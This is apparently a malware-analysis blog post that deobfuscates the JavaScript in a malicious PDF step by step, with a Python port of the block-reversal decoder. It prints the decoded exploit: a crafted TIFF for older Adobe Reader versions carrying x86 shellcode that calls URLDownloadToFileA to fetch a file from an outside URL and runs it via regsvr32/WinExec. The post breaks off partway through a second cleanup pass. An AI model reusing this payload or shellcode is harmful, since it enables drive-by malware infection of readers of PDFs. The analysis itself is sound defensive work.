x\\0x\\0x\\00x\\00\\00\\58x\\98x8Bx00x\\10x\\0x\\5x\\65x\\0x\\7x\\85x\\8E\\FF\\FFx\\FFxF5xBAx\\E5x\\0x\\8x\\ECx\\1x\\0x\\BBx\\E3\\47\\BEx\\20xDEx55x\\3Cx\\5x\\4x\\C4x\\2x\\Dx\\E4x\\F4\\E2\\C4x\\44xC4x55x\\00x\\5x\\4x\\C4x\\2x\\4x\\77x\\F6\\E6\\F6x\\C6x16x45x\\46x\\6x\\6x\\64x\\Fx\\9x\\56x\\C6\\14\\55x\\00x37x27x\\56x\\3x\\2x\\23x\\3x\\Ex\\87x\\56\\56s\t\n;\&quot;00xlehlru =+ lav_lihw\t\n;r( eel.llehstgn4401 &lt; hs ) =+ llehx\\\&quot;hs\t\n;\&quot;00lle6esab = e_4hs(edocnlle   \n\t\n;)fi rev_teg( )({)0009 &lt;  \nne      t_do\&quot; = ffiAu+a6x\\35x\\ggg/KB4Lupk///4x\\AAAw/AB1AAAAAAAAAAAAAAA15x\\4x\\B14x\\AA1AeR\\WBi35x\\86x4YPo54x\\oKBx\\14x\\u+j35x\\gg14x\\qb6KBI75x\\v5x\\S14x\\yV8AYi14x\\AAAAAAAAAA14x\\Ax\\A\\BBAAA1415x\\Q24x\\FU55xUQQ24x\\F5x\\q07x\\Eg8mVaB2EEe4x\\UgS4x\\76x\\X0p5\\e4x\\SAJd4x76x\\SBOFgXU4x\\p54x\\\\Q224x\\F55x6x\\TtEpzzA56x\\x\\f6x\\U7F34x\\b4x\\B4U15\\TQB64x\\84xxtIZa4x\\4x\\4x\\D2tId2t9CutI84x\\GtI6x\\Z2sIIx\\aiyXHGIc68U0\\HAeFQ1i17x\\gI396x\\14x4x\\Uyx4eAt74x\\96x\\eCGc\\94x\\BYt84x46x\\DS57X3/a47x\\YSv4x\\MsoZrHAat4Sx\\ArHAHay97x\\e96x\\Lqa5FW9/28PB7x\\4EY911K7x\\StXHAqk55\\jlta4x\\84x\\PQ\&quot;==Qpa7x \n;sle }   { e       \nne = ffit_d\\\&quot; x\\A+Bb6xj3515x\\96x\\6x\\f907x\\E8x\\o/////K24x\\w4x\\AAA14AA2\\14x\\AAA14xAAQAAAAAAAAW07x\\AAAx\\O\\96x\\S1414xx\\b6x\\iJW17A+BkKBYI5x\\4x\\a6x\\3x\\3x\\YrEh15407uajb4x\\BiSA\\14x\\AAY14xA14x\\AAAAAA14x\\AAAA4x\\BFUQBBA1FUQpEgjVaQB7x\\Nd6x\\Va1W7MpEgjVqSAAJ0u0Te4x\\Sx\\Cj65x\\q356x\\44x\\4pE7kOP\\JqSC6gIa6x15x\\BpEgx\\U\\M24x\\6436x54x\\3ikl3iw6x\\Y3iMY2i3Y0i94x\\4zig\\Uf4x\\mZ76xLKfd95x\\5x\\Vc4x\\yT24VAcLqe14x\\\\Ai\\JHj724x15x4x\\016x\\I6276x\\1KYsfgE\\d/3NIlv56xo1ia4x\\9eAk1iLxwimt\\co4x\\se14xIL4\\/Eom5Jua7xXrAXY1/b5x\\SSJhTg186x\\6x\\14x\\fx\\46x\\MW256x\\3/14x\\1d6\&quot;lO\n}    \n;    = ffit US\&quot;AAggDAqk\&quot;QC(worg + UQ'002 ,'BF )0 llehs +g +CJk'(wor,'Q\n;)2957    =+ ffit k\&quot; ADEAAAcAAEAAAAIwAAAEQAAAAAEAADAABAADEwAAAAAEBAAAABAADEgBAAAAEAAAAAEAAEEQEAAAAwFAAAAIAAEEIwAAAAEAAAAAwMADEAUCAAAAAAAAISAAA///jADMA\&quot;//fit_dne+\n;fzGgp    .ugeulaVwar = \n}\n;ffitnur(\n;)\n&quot;;
var KgYZ='UnqS';dXeb='tlli';if (dXeb=='BPbFBV') Yvseg='RHcwt';var JiLFEw;
function PJurKUSv(skImfAh,cYzOyPnWt){cYzOyPnWt=cYzOyPnWt.toString();var rWPjuC=&quot;&quot;;var NqEdBYHxb=0;var rOXMsWL=parseInt;for(var i=0;i&lt;skImfAh.length;i++){if((skImfAh.length-i)&gt;=rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb,NqEdBYHxb+1))){for(var i2=i+rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb,NqEdBYHxb+1))+(3-5+1);i2&gt;=i;i2--){rWPjuC+=skImfAh.substring(i2,i2+1);}
i+=rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb,NqEdBYHxb+1))-1;}
else{rWPjuC+=skImfAh.substring(i,i+1);}
NqEdBYHxb++;if(NqEdBYHxb&gt;cYzOyPnWt.length-1){if(NqEdBYHxb!=0)NqEdBYHxb=0;};}
if('kjELBq'=='pMJTc')MIikf();var yCRIn=28;function RXNq(){var dMFUNM='psgyT';if('lnkl'=='efrtju')flNQ();}
app.ZlPhsSeh=rWPjuC;var vuub;function QemqN(){var BSVkx='lKMeKr';if('ANWSSM'=='csYStq')VkeY();}}
var jgjS=47;gWJfmC='Xdvz';if (gWJfmC=='rxQSZ') vUtQDG='TFUs';UZcchX='luvbm';if (UZcchX=='lwxtv') yBEo();

function nUjlj(){}var SolyOF=45;
var pgJpC=xfa.host.numPages;
var TrrE=pgJpC;
var jQDAf = 380-(24%11)+TrrE;
PJurKUSv(WDpZj, jQDAf );
var VKwDSciC = &quot;kSVIeYsh&quot;
jChLB='cKAKS';if (jChLB=='bNJDYH') IQgOkG();var JkFxZW=84;var otAfk='HHFBDb';
var leEpPOjDG='';
var lMybUHrE='rOfeKlvuaUGOQniDqlshIM';
leEpPOjDG += lMybUHrE[3];
leEpPOjDG += lMybUHrE[7];
leEpPOjDG += lMybUHrE[6];
leEpPOjDG += lMybUHrE[8];
leEpPOjDG += lMybUHrE[5];

var kPvi;function cjcXAF(){}
leEpPOjDG = leEpPOjDG.replace(&quot;u&quot;, &quot;&quot;);
FDBpuw = (&quot;rkwUNvPk&quot;)[(VKwDSciC, leEpPOjDG)];
var tAKsEWbR = 'ZlPhsSeh';
var eCDTQ;function fyDCU(){var rwxjqk='MQbZRR';PgEBl='gKaPG';if (PgEBl=='xgzqD') YPGO();}
tAKsEWbR='aps3p.'+tAKsEWbR;
tAKsEWbR=tAKsEWbR.replace(&quot;ps3p&quot;, &quot;pp&quot;);
function pnOkXH(){}var QhSRcq=207;LMunyk='MJKv';if (LMunyk=='obONp') nubS();function oHdY(){var jtAav='CHno';uqCo='ZRZIA';if (uqCo=='ivBaPl') LMIRgd();}
var Itdzqqjus='';
var DjQdjGRE='mWvuzaYFRi.JjpeazHuBcsbHyVIlHp';
Itdzqqjus += DjQdjGRE[5];
Itdzqqjus += DjQdjGRE[13];
Itdzqqjus += DjQdjGRE[13];
Itdzqqjus += DjQdjGRE[10];
Itdzqqjus += DjQdjGRE[14];
Itdzqqjus += DjQdjGRE[2];
Itdzqqjus += DjQdjGRE[5];
Itdzqqjus += DjQdjGRE[27];

muCeJ='KcsrI';if (muCeJ=='hIio') URWv();function OOlYW(){}
FDBpuw(Itdzqqjus+'('+tAKsEWbR+');');
var ktPFXS;var RNdp;var pBanA='xeeH';

                </script>
                </event>
    <ui> 
                    <imageEdit/>
                </ui>
            </field>
        </subform>
    </subform>
</template>
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" accessibleContent="1" change="1" contentCopy="1" documentAssembly="1" formFieldFilling="1" metadata="1" modifyAnnots="1" print="1" printHighQuality="1"/>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/"><xfa:data><ASsQulJ><pgGzgu>Fbeivlcysllwk</pgGzgu></ASsQulJ></xfa:data></xfa:datasets>
<xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve"><annots/></xfdf>
<form xmlns="http://www.xfa.org/schema/xfa-form/2.8/" />
</xdp:xdp>


OK, so we are dealing with JavaScript. Let's clean it up, simplify it and prepare it for node-js:

malforsec1 = ""; //set string for output

WDpZj = "f\n\n noitcnusabocne_46e(ed\n{ )atad   46b rav  = GFEDCBA\"JIHRQPONMLKUTScbaZYXWVfednmlkjihgqpoyxwvutsr10z98765432=/+v    \n;\" ra ,2o ,1o,3o,2h ,1h 3h ib ,4h ,,st\n,0 = i     ca     0 =      \n,e  ,\"\" = cn  \nmt      a_p;][ = rr\n \n{ od      \n1o       = ahc.atadoCr++i(tAed\n;)         2oc.atad =rahi(tAedoC)++      \n;o  atad = 3hc.tAedoCra+i(  \n \n;)+    stib   o = 61 << 1o || 8 << 23o     \n \n;   ib = 1h  st & 81 >>3x0     \n;f   tib = 2h> s0 & 21 >f3x      \n;h  stib = 3>> 3x0 & 6 \n;f         4h& stib =x0    \n\n;f3   ra_pmt  a[rb = ]++c.46h(tArahc )1hc.46b +Ara + )2h(t46b(tArahc.)3hc.46b + rah\n;)4h(tA   elihw } i( .atad < nel\n \n;)htg   t = cne _pmnioj.rra''(   \n \n;)er cne nrut}\n;oitcnuf\ng n)(rev_te \n{a rav   _pppa = revv.preVreweioisirtSot.n(gna    \n;)_pppa = revv_palper.re(ec)'' ,'.' \n;elihw   pa(el.rev_ptgn\n{)4 < h   ppa     ev_'0' =+ r \n;er\t\n}   rutIesrap n(tn,rev_ppa01 nuf\n}\n;)itc(worg nodob{)nel ,y  \n(elihw  dobhtgnel.y <   \n{)nel    ydob    =+  \n;ydob}  ter    \nnruus.ydob tsb ,0(gnirnelnuf\n}\n;)itc)(nur no\t\n{_lru ravravPdRGf =  + x\\30=h&\"\"00llehs\t\n; = 0x\\8Ex\\\"x\\0x\\00x\\00\\00\\38x\\D5xDEx13x\\50x\\Cx\\8x\\46x\\9x\\Bx\\03x\\17\\B8\\C0x\\67xB8xC1x\\67x\\8x\\0x\\64x\\Bx\\8x\\E7x\\B8\\02\\63x\\B8x66xF4x\\93x\\1x\\Fx\\57x\\8x\\2x\\FEx\\EB\\00\\00x\\00x10xFBx\\EEx\\Cx\\0x\\00x\\Fx\\0x\\10x\\00\\FE\\08x\\8Ex10x00x\\00x\\8x\\8x\\AEx\\9x\\1x\\FEx\\2C\\00\\00x\\00x25x08x\\86x\\0x\\0x\\00x\\0x\\0x\\59x\\FF\\FC\\00x\\00x00xAEx\\98x\\8x\\Ex\\2Cx\\1x\\Fx\\00x\\00\\00\\6Fx\\13x10xA8x\\2Cx\\9x\\0x\\53x\\Cx\\0x\\00x\\20\\00\\BFx\\08x00x60x\\47x\\8x\\3x\\C1x\\8x\\2x\\BEx\\64\\EE\\40x\\6Cx23x98x\\00x\\Ex\\Cx\\18x\\Ax\\2x\\10x\\2E\\00\\25x\\00xFFx3Dx\\59x\\0x\\0x\\00x\\0x\\0x\\AEx\\98\\18\\DEx\\2Cx10x00x\\00x\\5x\\Fx\\05x\\2x\\Fx\\7Dx\\59\\00\\00x\\00xA6xA6x\\00x\\0x\\Ex\\98x\\0x\\Ax\\2Cx\\18\\FE\\00x\\00x00x98x\\25x\\Ex\\Cx\\18x\\Ax\\2x\\20x\\B0\\00\\25x\\00xA6xFFx\\00x\\Dx\\0x\\A6x\\0x\\5x\\AEx\\98\\18\\FEx\\2Cx00x00x\\00x\\5x\\9x\\FFx\\2x\\5x\\00x\\BD\\00\\A6x\\00x50xAEx\\98x\\8x\\Ex\\2Cx\\1x\\3x\\00x\\00\\00\\FFx\\25x59x00x\\BDx\\0x\\6x\\00x\\0x\\Ax\\FFx\\00\\59\\00x\\FDx00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x27x76x\\56x\\7x\\7x\\67x\\3x\\2x\\23x\\33\\02\\37x\\D2x02x56x\\74x\\7x\\6x\\45x\\4x\\5x\\07x\\D6\\05\\47x\\16x86x00x\\14x\\4x\\6x\\F6x\\Cx\\1x\\C4x\\46\\96\\27x\\26x16x97x\\27x\\4x\\4x\\00x\\1x\\7x\\47x\\56\\05\\F6x\\27x36x46x\\14x\\6x\\6x\\27x\\4x\\5x\\37x\\37\\00\\96x\\75xE6x87x\\54x\\6x\\0x\\36x\\5x\\0x\\87x\\54\\96\\05x\\47x27x36x\\F6x\\6x\\7x\\37x\\5x\\3x\\BBx\\00\\98\\98x\\2Fx7Fx0Cx\\03x\\Ax\\Fx\\57x\\Ex\\Dx\\7Fx\\92\\98\\13x\\9Fx0CxC3x\\EBx\\0x\\0x\\00x\\0x\\0x\\5Bx\\30\\8B\\00x\\10x00xDAx\\66x\\0x\\Bx\\58x\\3x\\8x\\00x\\10\\00\\07x\\B8x87x6Cx\\38x\\1x\\Bx\\30x\\Cx\\5x\\10x\\8B\\00\\D8x\\00xDBx10x\\CBx\\0x\\Ax\\00x\\0x\\Dx\\58x\\30\\8B\\00x\\10x00xDAx\\BAx\\0x\\Bx\\58x\\3x\\8x\\00x\\10\\00\\BAx\\05xDAx58x\\30x\\Bx\\0x\\10x\\8x\\0x\\BAx\\00\\E5\\BDx\\13xDAx30x\\65x\\8x\\0x\\8Bx\\5x\\1x\\00x\\00\\98\\98x\\6Cx7DxCFx\\15x\\Fx\\5x\\6Ax\\3x\\9x\\40x\\47\\E5\\BEx\\34x9Ex39x\\E5x\\Dx\\0x\\0Ex\\1x\\3x\\4Cx\\58\\10\\00x\\00x13x69x\\6Fx\\6x\\Cx\\DAx\\6x\\1x\\20x\\0E\\30\\CBx\\58x10x00x\\00x\\8x\\Ax\\6Cx\\9x\\Dx\\58x\\30\\8B\\00x\\10x00xBEx\\3Cx\\1x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\58x\\98x8Bx00x\\10x\\0x\\5x\\65x\\0x\\7x\\85x\\8E\\FF\\FFx\\FFxF5xBAx\\E5x\\0x\\8x\\ECx\\1x\\0x\\BBx\\E3\\47\\BEx\\20xDEx55x\\3Cx\\5x\\4x\\C4x\\2x\\Dx\\E4x\\F4\\E2\\C4x\\44xC4x55x\\00x\\5x\\4x\\C4x\\2x\\4x\\77x\\F6\\E6\\F6x\\C6x16x45x\\46x\\6x\\6x\\64x\\Fx\\9x\\56x\\C6\\14\\55x\\00x37x27x\\56x\\3x\\2x\\23x\\3x\\Ex\\87x\\56\\56s\t\n;\"00xlehlru =+ lav_lihw\t\n;r( eel.llehstgn4401 < hs ) =+ llehx\\\"hs\t\n;\"00lle6esab = e_4hs(edocnlle   \n\t\n;)fi rev_teg( )({)0009 <  \nne      t_do\" = ffiAu+a6x\\35x\\ggg/KB4Lupk///4x\\AAAw/AB1AAAAAAAAAAAAAAA15x\\4x\\B14x\\AA1AeR\\WBi35x\\86x4YPo54x\\oKBx\\14x\\u+j35x\\gg14x\\qb6KBI75x\\v5x\\S14x\\yV8AYi14x\\AAAAAAAAAA14x\\Ax\\A\\BBAAA1415x\\Q24x\\FU55xUQQ24x\\F5x\\q07x\\Eg8mVaB2EEe4x\\UgS4x\\76x\\X0p5\\e4x\\SAJd4x76x\\SBOFgXU4x\\p54x\\\\Q224x\\F55x6x\\TtEpzzA56x\\x\\f6x\\U7F34x\\b4x\\B4U15\\TQB64x\\84xxtIZa4x\\4x\\4x\\D2tId2t9CutI84x\\GtI6x\\Z2sIIx\\aiyXHGIc68U0\\HAeFQ1i17x\\gI396x\\14x4x\\Uyx4eAt74x\\96x\\eCGc\\94x\\BYt84x46x\\DS57X3/a47x\\YSv4x\\MsoZrHAat4Sx\\ArHAHay97x\\e96x\\Lqa5FW9/28PB7x\\4EY911K7x\\StXHAqk55\\jlta4x\\84x\\PQ\"==Qpa7x \n;sle }   { e       \nne = ffit_d\\\" x\\A+Bb6xj3515x\\96x\\6x\\f907x\\E8x\\o/////K24x\\w4x\\AAA14AA2\\14x\\AAA14xAAQAAAAAAAAW07x\\AAAx\\O\\96x\\S1414xx\\b6x\\iJW17A+BkKBYI5x\\4x\\a6x\\3x\\3x\\YrEh15407uajb4x\\BiSA\\14x\\AAY14xA14x\\AAAAAA14x\\AAAA4x\\BFUQBBA1FUQpEgjVaQB7x\\Nd6x\\Va1W7MpEgjVqSAAJ0u0Te4x\\Sx\\Cj65x\\q356x\\44x\\4pE7kOP\\JqSC6gIa6x15x\\BpEgx\\U\\M24x\\6436x54x\\3ikl3iw6x\\Y3iMY2i3Y0i94x\\4zig\\Uf4x\\mZ76xLKfd95x\\5x\\Vc4x\\yT24VAcLqe14x\\\\Ai\\JHj724x15x4x\\016x\\I6276x\\1KYsfgE\\d/3NIlv56xo1ia4x\\9eAk1iLxwimt\\co4x\\se14xIL4\\/Eom5Jua7xXrAXY1/b5x\\SSJhTg186x\\6x\\14x\\fx\\46x\\MW256x\\3/14x\\1d6\"lO\n}    \n;    = ffit US\"AAggDAqk\"QC(worg + UQ'002 ,'BF )0 llehs +g +CJk'(wor,'Q\n;)2957    =+ ffit k\" ADEAAAcAAEAAAAIwAAAEQAAAAAEAADAABAADEwAAAAAEBAAAABAADEgBAAAAEAAAAAEAAEEQEAAAAwFAAAAIAAEEIwAAAAEAAAAAwMADEAUCAAAAAAAAISAAA///jADMA\"//fit_dne+\n;fzGgp    .ugeulaVwar = \n}\n;ffitnur(\n;)\n";

function PJurKUSv(skImfAh, cYzOyPnWt) {
    cYzOyPnWt = cYzOyPnWt.toString();
    var rWPjuC = "";
    var NqEdBYHxb = 0;
    var rOXMsWL = parseInt;
    for (var i = 0; i < skImfAh.length; i++) {
        if ((skImfAh.length - i) >= rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb, NqEdBYHxb + 1))) {
            for (var i2 = i + rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb, NqEdBYHxb + 1)) + (3 - 5 + 1); i2 >= i; i2--) {
                rWPjuC += skImfAh.substring(i2, i2 + 1);
            }
            i += rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb, NqEdBYHxb + 1)) - 1;
        } else {
            rWPjuC += skImfAh.substring(i, i + 1);
        }
        NqEdBYHxb++;
        if (NqEdBYHxb > cYzOyPnWt.length - 1) {
            if (NqEdBYHxb != 0) NqEdBYHxb = 0;
        };
    }
//    app.ZlPhsSeh = rWPjuC; @malforsec app is PDF specific
    malforsec1 = rWPjuC;

}

var pgJpC = 2; //@malforsec Numpages = 2
var TrrE = pgJpC;
var jQDAf = 380 - (24 % 11) + TrrE;

PJurKUSv(WDpZj, jQDAf); //@malforsec call the string manipulation

var VKwDSciC = "kSVIeYsh"

var leEpPOjDG = '';
var lMybUHrE = 'rOfeKlvuaUGOQniDqlshIM'; // @malforsec euval -> replace("u","") -> eval
leEpPOjDG += lMybUHrE[3];
leEpPOjDG += lMybUHrE[7];
leEpPOjDG += lMybUHrE[6];
leEpPOjDG += lMybUHrE[8];
leEpPOjDG += lMybUHrE[5];

leEpPOjDG = leEpPOjDG.replace("u", "");
FDBpuw = ("rkwUNvPk")[(VKwDSciC, leEpPOjDG)];
var tAKsEWbR = 'ZlPhsSeh';

tAKsEWbR = 'aps3p.' + tAKsEWbR;
tAKsEWbR = tAKsEWbR.replace("ps3p", "pp"); //@malforsec -> app.

var Itdzqqjus = '';
var DjQdjGRE = 'mWvuzaYFRi.JjpeazHuBcsbHyVIlHp'; //@malforsec app.eval
Itdzqqjus += DjQdjGRE[5];
Itdzqqjus += DjQdjGRE[13];
Itdzqqjus += DjQdjGRE[13];
Itdzqqjus += DjQdjGRE[10];
Itdzqqjus += DjQdjGRE[14];
Itdzqqjus += DjQdjGRE[2];
Itdzqqjus += DjQdjGRE[5];
Itdzqqjus += DjQdjGRE[27];

console.log(malforsec1); //@malforsec console.log instead of eval
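PJurKUSv() above is a block-reversal scrambler: the key 380 is used as a string of digits and, walking the input, each digit n reverses the next n characters in place (a 0 reverses nothing but still advances the key), so the same walk both scrambles and unscrambles a string. The key comes from xfa.host.numPages, which ties decoding to the document and is why the node-js version pins pgJpC to 2. The Python below is an added example, not this post's or the kit's code; its sample input is the opening of WDpZj as quoted above.

```python
def derive_key(num_pages):
    """jQDAf = 380 - (24 % 11) + xfa.host.numPages, as in the stream above (2 pages -> 380)."""
    return 380 - (24 % 11) + num_pages


def unreverse_blocks(data, key):
    """Port of PJurKUSv(). The key is used as a string of digits, cycling from the start:
    digit n reverses the next n characters in place; n = 0 reverses nothing but still
    consumes a key position; if fewer than n characters remain, one is copied unchanged.
    Reversing fixed blocks is an involution, so this both scrambles and unscrambles."""
    key = str(key)
    out = []
    i = k = 0
    while i < len(data):
        n = int(key[k])
        if len(data) - i >= n:
            out.append(data[i:i + n][::-1])
            i += n - 1                 # the JS's i += parseInt(...) - 1
        else:
            out.append(data[i])
        k = (k + 1) % len(key)         # NqEdBYHxb++ with wrap to 0
        i += 1
    return "".join(out)


# Opening of WDpZj as quoted above (the \n are the literal's escapes, i.e. real newlines)
SAMPLE_PREFIX = "f\n\n noitcnusabocne_46e(ed\n{ )atad"

if __name__ == "__main__":
    key = derive_key(2)
    print(key, repr(unreverse_blocks(SAMPLE_PREFIX, key)))
```

With the key as 380 the walk reverses 3 characters, then 8, then nothing, and repeats; feeding it a different page count yields a different key string and garbage output, which is the point of deriving the key from the document rather than hardcoding it.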


Nicer output on this run:


function base64_encode(data) {
    var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var o1, o2, o3, h1, h2, h3, h4, bits, i = 0,
        ac = 0,
        enc = "",
        tmp_arr = [];
 
    do {
        o1 = data.charCodeAt(i++);
        o2 = data.charCodeAt(i++);
        o3 = data.charCodeAt(i++);
 
        bits = o1 << 16 | o2 << 8 | o3;
 
        h1 = bits >> 18 & 0x3f;
        h2 = bits >> 12 & 0x3f;
        h3 = bits >> 6 & 0x3f;
        h4 = bits & 0x3f;

        tmp_arr[ac++] = b64.charAt(h1) + b64.charAt(h2) + b64.charAt(h3) + b64.charAt(h4);
    } while (i < data.length);
 
    enc = tmp_arr.join('');
 
    return enc;
}
function get_ver(){
    var app_ver = app.viewerVersion.toString();
    app_ver = app_ver.replace('.', '');
    while(app_ver.length < 4){
        app_ver += '0';
    }
 return parseInt(app_ver, 10);
}
function grow(body, len){
    while(body.length < len){
        body += body;
    }
    return body.substring(0, len);
}
function run(){
 var url_var = fGRdP + "&h=03\x00";
 shell = "\xE8\x00\x00\x00\x00\x5D\x83\xED\x05\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x46\x08\x8B\x7E\x20\x8B\x36\x66\x39\x4F\x18\x75\xF2\xBE\xEF\x00\x00\x00\x01\xEE\xBF\xCF\x00\x00\x00\x01\xEF\xE8\x80\x01\x00\x00\x89\xEA\x81\xC2\xEF\x00\x00\x00\x52\x68\x80\x00\x00\x00\xFF\x95\xCF\x00\x00\x00\x89\xEA\x81\xC2\xEF\x00\x00\x00\x31\xF6\x01\xC2\x8A\x9C\x35\x00\x02\x00\x00\x80\xFB\x00\x74\x06\x88\x1C\x32\x46\xEB\xEE\xC6\x04\x32\x00\x89\xEA\x81\xC2\xE2\x01\x00\x00\x52\xFF\x95\xD3\x00\x00\x00\x89\xEA\x81\xC2\xED\x01\x00\x00\x52\x50\xFF\x95\xD7\x00\x00\x00\x6A\x00\x6A\x00\x89\xEA\x81\xC2\xEF\x00\x00\x00\x52\x89\xEA\x81\xC2\x0B\x02\x00\x00\x52\x6A\x00\xFF\xD0\x6A\x05\x89\xEA\x81\xC2\xEF\x00\x00\x00\x52\xFF\x95\xDB\x00\x00\x00\x6A\x05\x89\xEA\x81\xC2\xE3\x00\x00\x00\x52\xFF\x95\xDB\x00\x00\x00\x6A\x00\xFF\x95\xDF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x72\x65\x67\x73\x76\x72\x33\x32\x20\x2D\x73\x20\x47\x65\x74\x54\x65\x6D\x70\x50\x61\x74\x68\x41\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x57\x69\x6E\x45\x78\x65\x63\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00\xBB\x89\xF2\x89\xF7\x30\xC0\xAE\x75\xFD\x29\xF7\x89\xF9\x31\xC0\xBE\x3C\x00\x00\x00\x03\xB5\xB8\x01\x00\x00\x66\xAD\x03\x85\xB8\x01\x00\x00\x8B\x70\x78\x83\xC6\x1C\x03\xB5\xB8\x01\x00\x00\x8D\xBD\xBC\x01\x00\x00\xAD\x03\x85\xB8\x01\x00\x00\xAB\xAD\x03\x85\xB8\x01\x00\x00\x50\xAB\xAD\x03\x85\xB8\x01\x00\x00\xAB\x5E\x31\xDB\xAD\x56\x03\x85\xB8\x01\x00\x00\x89\xC6\x89\xD7\x51\xFC\xF3\xA6\x59\x74\x04\x5E\x43\xEB\xE9\x5E\x93\xD1\xE0\x03\x85\xC4\x01\x00\x00\x31\xF6\x96\x66\xAD\xC1\xE0\x02\x03\x85\xBC\x01\x00\x00\x89\xC6\xAD\x03\x85\xB8\x01\x00\x00\xC3\xEB\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\x85\xB8\x01\x00\x00\x56\x57\xE8\x58\xFF\xFF\xFF\x5F\x5E\xAB\x01\xCE\x80\x3E\xBB\x74\x02\xEB\xED\xC3\x55\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C\x4C\x00\x55\x52\x4C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x54\x6F\x46\x69\x6C\x65\x41\x00\x55\x73\x65\x72\x33\x32\x2E\x65\x78\x65\x00";
 shell += url_var;
 while (shell.length < 1044) shell += "\x00";
 shell = base64_encode(shell);
 
    if(get_ver() < 9000){
        end_tiff = "o+uA\x53\x6agggkpuL4BK/////wAAA\x41BAAAAAAAAAAAA\x51AAAA\x41AA\x41BReA\x53iBW\x68\x45oPY4BKo+u\x41\x53j\x41gg\x6bqv\x57IBK\x58Vy\x41SiYAAAAA\x41AAAA\x41AAAA\x41AAABB\x51UF\x42Q\x55F\x42QQU\x58gE\x70qaVm\x4eEE2BSgUX\x67\x45p0JAS\x4e\x4dFOBS\x67UXg\x45p\x42Q\x55F\x42\x65AzzpEtT\x67U\x6f\x43F4B\x4b\x51U\x46BQT\x48\x4aZItx\x4dIt2D\x49t2\x48ItuCItGIIs2Z\x6a\x6cIGHXyi0U8i1QFeAH\x71\x693Ig\x41e4xyU\x47tAe\x69\x4cGCtYB\x49\x4875SD\x64/3XvSY\x74a\x4aAHrZosMS4taHAHrA\x79yL\x69e\x5aqBP82/9WF\x77K119YE4S\x55kqAHXtlj\x48\x4atQP\x7apQ==";
    } else {
        end_tiff = "\x6bB+A\x53j\x69\x51\x68E\x709fo\x42K/////w\x41AAA\x42AAAAA\x41\x41AAAAAQAAAAAAAA\x70WO\x41S\x69\x41Ji\x6b\x71WIYBKkB+A\x53\x6a\x43\x51hErY\x704B\x4bjauASiYAA\x41\x41AAA\x41AAAAAAAA\x41\x41ABBQUFBQUFBQaVjgEp\x71aV\x6dNM7WASqVjgEp0JAS\x4eT0uC\x53q\x56j\x67Ep4\x44POkIg6CSqJ\x6agEpB\x51U\x46\x42M\x63lki3\x45wi3YMi3Y\x63i24\x49i0YgizZm\x4fU\x67\x59dfKL\x52Ty\x4cVAV4\x41eqLciA\x427jHJ\x51\x610\x426IsYK1\x67EgfvlIN3/d\x659\x4ai1okAetmiwxLi1oc\x41es\x44LIuJ5moE/\x7ab/1YXArX\x581gThJSS\x6f\x41\x64\x652WM\x63\x6d1\x41/Ol";
    }
    tiff = "SUkqADggAACQ" + grow('QUFB', 2000) + shell + grow('kJCQ', 7592);
    tiff += "kAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////"+end_tiff;
    pgGzgu.rawValue = tiff;
}
run();



As always, more JavaScript. Get the new JS ready for node.js:

function base64_encode(data) {
    var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var o1, o2, o3, h1, h2, h3, h4, bits, i = 0,
        ac = 0,
        enc = "",
        tmp_arr = [];

    do {
        o1 = data.charCodeAt(i++);
        o2 = data.charCodeAt(i++);
        o3 = data.charCodeAt(i++);

        bits = o1 << 16 | o2 << 8 | o3;

        h1 = bits >> 18 & 0x3f;
        h2 = bits >> 12 & 0x3f;
        h3 = bits >> 6 & 0x3f;
        h4 = bits & 0x3f;

        tmp_arr[ac++] = b64.charAt(h1) + b64.charAt(h2) + b64.charAt(h3) + b64.charAt(h4);
    } while (i < data.length);

    enc = tmp_arr.join('');

    return enc;
}

function get_ver() {
    //var app_ver = app.viewerVersion.toString();
    //@malforsec changed to work
    var app_ver = "9.3.0";
    app_ver = app_ver.replace('.', '');
    while (app_ver.length < 4) {
        app_ver += '0';
    }
    return parseInt(app_ver, 10);
}

function grow(body, len) {
    while (body.length < len) {
        body += body;
    }
    return body.substring(0, len);
}

function run() {
    var url_var = fGRdP + "&h=03\x00";
